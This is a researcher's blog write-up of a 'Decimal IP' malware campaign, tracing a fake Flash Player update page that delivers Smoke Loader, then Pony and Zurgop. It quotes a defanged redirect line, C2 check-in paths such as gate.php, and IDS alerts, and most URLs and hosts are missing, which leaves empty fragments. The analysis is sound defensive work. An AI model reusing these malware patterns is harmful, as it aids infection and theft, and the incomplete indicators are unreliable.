Decimal IP Campaign

For a background on the Decimal IP Campaign please read this article written on March 29th, 2017, by Jérôme Segura over at Malwarebytes Lab:

I got the decimal IP used for this infection from ‘s blog post found HERE.


  • – IP decimal redirector
  • – Fake Flash Player update landing page
  • – – Connectivity check
  • –
  • –
  • –
  • – – POST /po/asdfkuj.php
    • ET TROJAN Fareit/Pony Downloader Checkin 2
  • – – GET /asdoiu398j/gate.php?client_id=aed68d54&connected=0&server_port=0&debug=0
  • –
    • ET INFO Suspicious Windows NT version 9 User-Agent
    • ET TROJAN Generic gate[.].php GET with minimal headers
  • –
  • –

Traffic Filtered in Wireshark:

Traffic 1

Traffic 2

My User-Agent for this infection was IE 11 and I didn’t use a compromised website. Instead, I went directly to the decimal IP at 1755118211, which then redirected my host to The response from that GET request resulted in a redirect to a fake Flash Player update landing page at

302 Found -

The fake Flash Player update page at was mirrored from, which no longer resolves. Here is an image of the fake Flash Player page:

Decimal IP fake flash player landing page

In the source code of the page contains the following location.href:

setTimeout(“location.href = ‘hxxp://’;”, 1000);

This prompts the user to open or save flashplayer24pp_id_install.exe. The executable is being identified as Smoke Loader:

The last time I got Smoke Loader it downloaded Neutrino Bot:

Persistence found during this infection:



persistance 1

After letting the infection system sit idle for about 10 minutes we see additional malware (CC81.tmp.dll) dropped in %Temp%:


Scanning CC81.tmp.dll on VirusTotal and Hybrid-Analysis showed that it was Pony:

This is followed by Pony callback traffic via POST requests to Other URLs found in the binary/memory include:

Pattern match: “hxxp://” (resolves to
Pattern match: “hxxp://” (resolves to
Pattern match: “hxxp://” (resolves to
Pattern match: “hxxp://” (resolves to

Later we see an executable called tdcbwl.exe dropped in %AppData%:


Scanning the file on VirusTotal and Hybrid-Analysis shows it could be Zurgop downloader:

This is followed by GET requests to the following URLs: 1

Connects to via TCP port 1079 2

My infected host is making connections to via TCP port 1079 every 5 minutes:

Traffic 3

TCP port scan on

25/tcp   open  smtp
1067/tcp open  instl_boots
1075/tcp open  rdrmshc
1079/tcp open  asprovatalk

Artifacts from this infection:

You can download the malware from the Hybrid-Analysis reports.

Until next time!

Leave a Comment

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

%d bloggers like this: